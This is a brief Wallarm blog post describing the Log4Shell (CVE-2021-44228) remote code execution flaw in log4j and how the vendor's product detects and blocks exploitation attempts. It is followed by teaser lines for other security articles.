A 0-day exploit in the Java core library log4j was discovered that results in Remote Code Execution (RCE) by simple 1-line exploit with JNDI URL. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. Read more.
The attack surface is very wide since it’s almost impossible to find any single Java project without the log4j library enabled. It affects internal services and APIs that are based on Java and uses other API and application data to log them.
Wallarm automatically identifies attempts of the Log4Shell exploitation and logs these attempts in the Wallarm Console. Corresponding changes have been added within two hours after the first information about CVE-2021-44228 has been published.
You can search for the relevant events by using filter by CVE:
When using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.
When using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to support@wallarm.com if you need assistance.
Dimitris Georgiou has been a self-professed computer geek since the early 80s. At university, he…
Your board wants AI. Your developers are building with it. Your budget committee is asking…
AI systems are no longer just isolated models responding to human prompts. In modern production…
Broken authorization is one of the most widely known API vulnerabilities. It features in the…
The shadow technology problem is getting worse. Over the past few years, organizations have scaled…
API security has been a growing concern for years. However, while it was always seen…